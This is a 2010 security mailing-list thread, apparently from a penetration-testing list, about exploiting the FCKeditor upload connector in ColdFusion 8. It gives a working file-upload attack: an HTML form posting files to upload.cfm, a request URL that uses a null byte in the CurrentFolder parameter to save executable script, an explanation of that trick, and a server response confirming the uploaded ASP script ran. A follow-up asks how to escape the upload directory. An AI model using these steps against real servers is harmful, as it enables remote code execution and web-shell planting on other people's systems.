Re: ColdFusion 8 w/ FCKEditor

[The Dead <th3d34d () gmail com>]

George,

Is there something that could be done in case of the upload folder is
out of the document root of the webserver?
The folder where the upload  is done "/userfiles/file" isn't acessible
throught URL.
I tried to scape the CurrentFolder parameter to force the upload to
another folder but this version of CFM FCK connector seems that is not
vulnerable.

Thanks,

On Wed, Jun 30, 2010 at 9:54 PM, The Dead <th3d34d () gmail com> wrote:
> Hello George,
>
> The trick worked! Thanks!
>
> The request was:
> http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?CurrentForder=/shell.asp%00
>
> I got this response from server:
>
>                <script type="text/javascript">
>                        window.parent.OnUploadCompleted( 0,
> "/userfiles/file/teste.asp�/teste.txt", "teste.txt", "0" );
>                </script>
>
> So, I could access /userfiles/file/teste.asp and got the asp script executed.
>
> Thanks to all!
>
>
> On Wed, Jun 30, 2010 at 8:42 PM, George A. Theall <theall () tifaware com> wrote:
> > On Wed, Jun 30, 2010 at 05:59:04PM -0300, The Dead wrote:
> > > I got two servers with this condition.
> > >
> > > In one of the server, CFM files were allowed to be uploaded as ASP and
> > > others. It was simple to upload to the server using a HTML based form
> > > as:
> > >
> > > <html>
> > > <form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?";
> > > method="post" enctype="multipart/form-data">
> > >       <input type="file" name="NewFile"></input>
> > >       <input type="submit">
> > > </form>
> > >
> > > In another server, CFM extensions and others like ASP, PHP are not
> > > allowed to be uploaded.
> > > So, I?m trying something to solve this case.
> >
> > The trick is to pass the name of the destination file through the
> > 'CurrentFolder' parameter and follow it by a NULL byte, use an innocuous
> > file name for 'NewFile', and include CFM code as the contents.  I
> > suppose you might be able to substitute ASP code or something else, but
> > you _know_ the server supports Coldfusion scripts.
> >
> > George
> > --
> > theall () tifaware com
> >
> > ------------------------------------------------------------------------
> > This list is sponsored by: Information Assurance Certification Review Board
> >
> > Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
> > and CEPT certs require a full practical examination in order to become certified.
> >
> > http://www.iacertification.org
> > ------------------------------------------------------------------------

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------